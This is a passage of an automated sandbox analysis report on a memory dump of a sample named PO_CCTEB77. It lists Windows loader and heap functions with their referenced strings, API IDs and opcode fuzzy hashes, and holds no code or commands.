                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-2558761708
                                                                            • Opcode ID: 82d949fd489393ea1f7d5f8783db89e302ac4e1387ffae9c2b1ad3494e91066f
                                                                            • Instruction ID: 20d0f4ea872148cef177bc052e1b5adb6f79f0eb6ee55264086e83b674c31fe1
                                                                            • Opcode Fuzzy Hash: 82d949fd489393ea1f7d5f8783db89e302ac4e1387ffae9c2b1ad3494e91066f
                                                                            • Instruction Fuzzy Hash: 9D11E4B1358155DFDB1ADA18C8D4BB9F7B4EF40B15F188159F406CB255D730D980C751
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 018420DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • LdrpInitializationFailure, xrefs: 018420FA
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01842104
                                                                            • Process initialization failed with status 0x%08lx, xrefs: 018420F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-2986994758
                                                                            • Opcode ID: 5e1e463164f0612cbe1440ec4c5bbeec662cf4cce049a36b04156f0beaa6b21e
                                                                            • Instruction ID: 48ce5c93b1c7d815137ff0603ea41995b8b63a8db19b8aa5221932bceb10a4d2
                                                                            • Opcode Fuzzy Hash: 5e1e463164f0612cbe1440ec4c5bbeec662cf4cce049a36b04156f0beaa6b21e
                                                                            • Instruction Fuzzy Hash: D6F0FC7568070C7BE724D64CDC53F957769FB84B54F540069FB00B7281D5F0AB44CA91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017D03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: #%u
                                                                            • API String ID: 48624451-232158463
                                                                            • Opcode ID: f2c1d0e6d7fb93ae00281e043088e6ba46e1c992e13a958672b2ac88d739f918
                                                                            • Instruction ID: ac07dd888861d5b9a24131d703e6acd3bdaf6673bf08464ac3b3c4c47d775832
                                                                            • Opcode Fuzzy Hash: f2c1d0e6d7fb93ae00281e043088e6ba46e1c992e13a958672b2ac88d739f918
                                                                            • Instruction Fuzzy Hash: B8712871A0015A9FDB02DFA8C994FAEBBF8FF18704F144065E905E7251EA74EE41CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017CA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • LdrResSearchResource Enter, xrefs: 017CAA13
                                                                            • LdrResSearchResource Exit, xrefs: 017CAA25
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                            • API String ID: 0-4066393604
                                                                            • Opcode ID: efdcea861e5d973f7ceebcd65c63ffbd46b31263ffb01c91f2821a738c2667d7
                                                                            • Instruction ID: 0df97b9e729912e0f45db97d90c22576525f58e4f3f34ae3fd94788c2a6e0624
                                                                            • Opcode Fuzzy Hash: efdcea861e5d973f7ceebcd65c63ffbd46b31263ffb01c91f2821a738c2667d7
                                                                            • Instruction Fuzzy Hash: C0E17271A0061D9BEB228E9CC954BAEFBBAFF18715F10456EED01E7251E7349A80CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0188A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `$`
                                                                            • API String ID: 0-197956300
                                                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                            • Instruction ID: 6de16cfbf43e9ebf7cdeef4df788677c1753e3e5046700b225a5335c5d3d3785
                                                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                            • Instruction Fuzzy Hash: EDC1D4312043469BEB29EF28C841B2BBBE5AFC4318F184A2EF695C72D0D775D645CB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0183E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: Legacy$UEFI
                                                                            • API String ID: 2994545307-634100481
                                                                            • Opcode ID: 0399193a6ae080030ee31949f4135c230d934b94f8d5e313b29d94ca48d99813
                                                                            • Instruction ID: 8bc1ad0ba57b796f0f4fcb3588aa04ec006cf47bbfbacfe6517a36ee0156107b
                                                                            • Opcode Fuzzy Hash: 0399193a6ae080030ee31949f4135c230d934b94f8d5e313b29d94ca48d99813
                                                                            • Instruction Fuzzy Hash: C2615071E003199FDB15DFA8C840BAEBBB5FB88704F58406DE649EB291D771AA40CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 018643D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$MUI
                                                                            • API String ID: 0-17815947
                                                                            • Opcode ID: 2971db773c12b2477fbf7ed97cd1fd9c49fc62cec1d2cc0a04edf872bf4adecd
                                                                            • Instruction ID: eed4623597cae992e142874549a43a3d626ab54172aa437781bf69e8d452507a
                                                                            • Opcode Fuzzy Hash: 2971db773c12b2477fbf7ed97cd1fd9c49fc62cec1d2cc0a04edf872bf4adecd
                                                                            • Instruction Fuzzy Hash: 7B5117B1E0021DAEDB11DFA9CC99EEEBBBDEB48754F100529F611F7290D6709A05CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017C04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • kLsE, xrefs: 017C0540
                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 017C063D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                            • API String ID: 0-2547482624
                                                                            • Opcode ID: 404b1e02f1490f73dbab7048efbac8d77a7345fd9c38ca10a4d430e7446ca2b5
                                                                            • Instruction ID: 06e4433cc0e889775d266104c9efbb07ba8983adb25954440d526f8ea7a1fcc6
                                                                            • Opcode Fuzzy Hash: 404b1e02f1490f73dbab7048efbac8d77a7345fd9c38ca10a4d430e7446ca2b5
                                                                            • Instruction Fuzzy Hash: CA518A79504742CFD725DF28C584AA7FBE4AF84B04F20492EEAAA87241E770D545CFD2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017CA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 017CA309
                                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 017CA2FB
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                            • API String ID: 0-2876891731
                                                                            • Opcode ID: 441f4d4d21a3fcf2db59a909a39eefb76cff4dfa4a57f3445769c01307cfe397
                                                                            • Instruction ID: 0185ddf72fe2a87bf4251c37e9645c89862d9c70b368c543dadf3dc58c937821
                                                                            • Opcode Fuzzy Hash: 441f4d4d21a3fcf2db59a909a39eefb76cff4dfa4a57f3445769c01307cfe397
                                                                            • Instruction Fuzzy Hash: 2A41DE71A04659DBDB22CF6DC854B6EBBB5FF84B00F2440ADE900DB291E7B5DA80CB41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017FA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: Cleanup Group$Threadpool!
                                                                            • API String ID: 2994545307-4008356553
                                                                            • Opcode ID: 4007427cf3dffbf28d4f016b05a23a98149108380bb1bf7e64d52041c7dc3a7d
                                                                            • Instruction ID: 80eef33889c0e65a207c17531841c44bb6db73df84cc1d0259089eb88d767b15
                                                                            • Opcode Fuzzy Hash: 4007427cf3dffbf28d4f016b05a23a98149108380bb1bf7e64d52041c7dc3a7d
                                                                            • Instruction Fuzzy Hash: B001D1B2254704AFE322DF24CD49B16B7E8EB85725F01893DAA4CC7290E374D904CB46
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017CC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: MUI
                                                                            • API String ID: 0-1339004836
                                                                            • Opcode ID: 7a1e2af7bd18ebb9c0d5ef327e4956908005ca7fa10dd1ea048a2bf137309520
                                                                            • Instruction ID: 63111db99e29e914d6342dc7ee11caef6505c0dbb257aa39a833ffb604994160
                                                                            • Opcode Fuzzy Hash: 7a1e2af7bd18ebb9c0d5ef327e4956908005ca7fa10dd1ea048a2bf137309520
                                                                            • Instruction Fuzzy Hash: 1D824B75E002198BEB25CFADC884BEDFBB5BF48B10F14816DE959AB251D7309981CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01846420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: 1bb7d4c824d296e4a45ffb608cf0a91d6faf6692f22ccd63903b6d41f4d728b0
                                                                            • Instruction ID: 1e71db38ba28ee84a2297aea19bd48f8bd128906fca198a0d8c3eb52a525aed8
                                                                            • Opcode Fuzzy Hash: 1bb7d4c824d296e4a45ffb608cf0a91d6faf6692f22ccd63903b6d41f4d728b0
                                                                            • Instruction Fuzzy Hash: 6D916371940219AFEB21DF95CD89FAEBBB8EF59750F200055F600EB195EA74AE00CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017FA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: GlobalTags
                                                                            • API String ID: 0-1106856819
                                                                            • Opcode ID: e310887322cb43b2750d4872cc3e4bb40fde1aa761420de2aa4ed8db5f603c8f
                                                                            • Instruction ID: 9d06c3a5cce7653eaa8d310b5333b8fa071dfd6a76bcd819af9d4d868031badd
                                                                            • Opcode Fuzzy Hash: e310887322cb43b2750d4872cc3e4bb40fde1aa761420de2aa4ed8db5f603c8f
                                                                            • Instruction Fuzzy Hash: 28716E75E0020AABDF25CF9CC5906ADBBB1BF88704F28812DE505E7244F7718A41CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01864978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .mui
                                                                            • API String ID: 0-1199573805
                                                                            • Opcode ID: 553b5835ed50842c1a87423b8681785437be06abb2d4fef0c3010a041ed96e93
                                                                            • Instruction ID: bac1fc46465d25f4af79de8d451e67096ed6c959784bd556061568a95effb11f
                                                                            • Opcode Fuzzy Hash: 553b5835ed50842c1a87423b8681785437be06abb2d4fef0c3010a041ed96e93
                                                                            • Instruction Fuzzy Hash: 90519472D0022AABDF15DF99D844AAEFBB9AF14B14F05412DEA11FB250D7349E01CBE4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017DE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: EXT-
                                                                            • API String ID: 0-1948896318
                                                                            • Opcode ID: 9bc28ca66895014be257460cd88f3d2fe0d4611bc381b4a69db46a65634191ed
                                                                            • Instruction ID: dc33a01dcb1234be222a66a5fedf285218898b6e8ef785c0ddf56f1d5af3581e
                                                                            • Opcode Fuzzy Hash: 9bc28ca66895014be257460cd88f3d2fe0d4611bc381b4a69db46a65634191ed
                                                                            • Instruction Fuzzy Hash: D241927250831A9BD752DA75C884B6BF7F8AF88B24F45092DF584DB180EA74D904C7A3
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017BCDEA Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: AlternateCodePage
                                                                            • API String ID: 0-3889302423
                                                                            • Opcode ID: bf7173d1a8babf13a26b7601edb8dc04f44435c41fef0c3098f265341bf62730
                                                                            • Instruction ID: 4a2bc489de826d4810b13caec560f1fa12dac1dd30ca46083f3b1d2c16ccec4f
                                                                            • Opcode Fuzzy Hash: bf7173d1a8babf13a26b7601edb8dc04f44435c41fef0c3098f265341bf62730
                                                                            • Instruction Fuzzy Hash: F541B0B2901249EADF29DB98CC80AEEFBBCFF84710F14415AE512E7258D7749B41CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0183C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: BinaryHash
                                                                            • API String ID: 0-2202222882
                                                                            • Opcode ID: f5e68f0ea816a442a2da0570aa35c62adc105d4e6a7ced51ff52c700e2c8e113
                                                                            • Instruction ID: 03c63d059fe7a2104cb156fe227c50b9634daa86482fbc1ee3ef00d9d54a94dd
                                                                            • Opcode Fuzzy Hash: f5e68f0ea816a442a2da0570aa35c62adc105d4e6a7ced51ff52c700e2c8e113
                                                                            • Instruction Fuzzy Hash: 25414FB1D0012DAADB21DA54CC84F9EB77CAB44714F0445A6EA08FB181DB709F898FA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01856B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #
                                                                            • API String ID: 0-1885708031
                                                                            • Opcode ID: 77ec16fb7bed1426fb01eac819f8d7804b167f4dc5334a72bd9f4fe735bcec3a
                                                                            • Instruction ID: 46a831db73119a272c634ce3de2ec3fc4a9ccd58c7e1f6bb6a2ac58c315bf94e
                                                                            • Opcode Fuzzy Hash: 77ec16fb7bed1426fb01eac819f8d7804b167f4dc5334a72bd9f4fe735bcec3a
                                                                            • Instruction Fuzzy Hash: AD312A31A007099BEB62DB69C854BAEBBB8DF54704FA44028ED40EB282E775DE05CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0183CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: BinaryName
                                                                            • API String ID: 0-215506332
                                                                            • Opcode ID: ead39dd6501c11966eb33e65032ad7b34f888ca78ddf772c36f124c828fd8404
                                                                            • Instruction ID: 5ea61212634ba05631a72ae5854d75c26ce4ea9d2f4b19bd32c82728778ffe6c
                                                                            • Opcode Fuzzy Hash: ead39dd6501c11966eb33e65032ad7b34f888ca78ddf772c36f124c828fd8404
                                                                            • Instruction Fuzzy Hash: 9F31017690051AAFEB1ADB59C855E6FBB74EBC0720F09412AE905F7291D7309F00DBE0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0184892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0184895E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                            • API String ID: 0-702105204
                                                                            • Opcode ID: 54585f3299cbe3df83134aaeb5173f2a8abb6aa0d652ffd1bf3e1dd854cfe1ca
                                                                            • Instruction ID: f3098e7e7e4c2af41890f99699ee6d475a809b88c39bdaa489321554c83bba73
                                                                            • Opcode Fuzzy Hash: 54585f3299cbe3df83134aaeb5173f2a8abb6aa0d652ffd1bf3e1dd854cfe1ca
                                                                            • Instruction Fuzzy Hash: 1B012B35601B0A9FE6356F99CCC4A5A7F65EF87758B08001CF74196255CF216A41C792
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01862000 Relevance: .8, Instructions: 757COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5852421dd6dc6919d01becaabd61731da7541ed5423be221a5631fc3925604b4
                                                                            • Instruction ID: 8dc84d5721b38676088e6625632ef87e04535669e972db13e2ff446dd51e33ef
                                                                            • Opcode Fuzzy Hash: 5852421dd6dc6919d01becaabd61731da7541ed5423be221a5631fc3925604b4
                                                                            • Instruction Fuzzy Hash: A342D2716083458BD725CF68C890A6FFBEABF88304F08496DFA82D7250D775DA45CB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01858158 Relevance: .6, Instructions: 617COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6182cb905f17ead9f8348d936d42129d366cf458850921192c5290f914f1042b
                                                                            • Instruction ID: 244e28ccc4677ad5207926c93f19a6614bdcd67410d7aee031a710029ad8cc8c
                                                                            • Opcode Fuzzy Hash: 6182cb905f17ead9f8348d936d42129d366cf458850921192c5290f914f1042b
                                                                            • Instruction Fuzzy Hash: A4425F75E002198FEB65CF69C881BADBBF5FF49300F14819AE949EB242D7349A85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017D2840 Relevance: .6, Instructions: 605COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 61469fa470d9e02cb9417b044c4b5f537fb0df22ddc3de5edf5d51eddd5962a5
                                                                            • Instruction ID: 5fc45cf7d4eb82a38fcf21cebd5a100bfbcefb6bb05e241248ac445a96e050b2
                                                                            • Opcode Fuzzy Hash: 61469fa470d9e02cb9417b044c4b5f537fb0df22ddc3de5edf5d51eddd5962a5
                                                                            • Instruction Fuzzy Hash: 9532C370A007698FDB26CF69C8447BEBBF2BF84704F24411DD946DB285E775AA82CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0186A118 Relevance: .6, Instructions: 591COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: be898433ea288b80f1043023b24d4ace40390e6783b17ab6301b299c42a0437b
                                                                            • Instruction ID: aa992a5571afee7ccfb3422735bbd3807676b1752f26e554c8a3109c63ba79d5
                                                                            • Opcode Fuzzy Hash: be898433ea288b80f1043023b24d4ace40390e6783b17ab6301b299c42a0437b
                                                                            • Instruction Fuzzy Hash: F722E2702046658BEB29CF2DC494372BBF9BF45304F088459E997EF286D735EA52CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017C6A50 Relevance: .5, Instructions: 548COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e5f3ffb32177be739dd2f6e9509b2f0aa0273f35d3d83d8afd70c2b8a76f5657
                                                                            • Instruction ID: abe9a277434f7fd2f632dfda844dcf1b363f345575628f9bf26086f873cbb378
                                                                            • Opcode Fuzzy Hash: e5f3ffb32177be739dd2f6e9509b2f0aa0273f35d3d83d8afd70c2b8a76f5657
                                                                            • Instruction Fuzzy Hash: E4327B71A04615CFDB26CF68C484AAABBF2FF48700F24456EE955EB391D734A981CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017E4A35 Relevance: .4, Instructions: 423COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                            • Instruction ID: 5cbfa28d4a8ed42c5a365322a1c99d0a16df30a3bf96526e4a562d27a7b8718c
                                                                            • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                            • Instruction Fuzzy Hash: A9F17F70E0121A9BDF15CFA9C588BAEFBF5AF48714F048129EA06EB354E774D981CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0185892B Relevance: .4, Instructions: 386COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7d368821202a0059ce298ebb62fb035c5f1c5319abcd177787a61c43cda884ff
                                                                            • Instruction ID: 4a782e75d6147366780c70d1b5d8aeb1fcd223be02c78f77f986d2cfd5b64ee3
                                                                            • Opcode Fuzzy Hash: 7d368821202a0059ce298ebb62fb035c5f1c5319abcd177787a61c43cda884ff
                                                                            • Instruction Fuzzy Hash: 49D1F271E0060A8BDF46CF6AC841AFEB7F5EF89304F18816AD955E7241E735EA01CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017C65D0 Relevance: .4, Instructions: 383COMMON
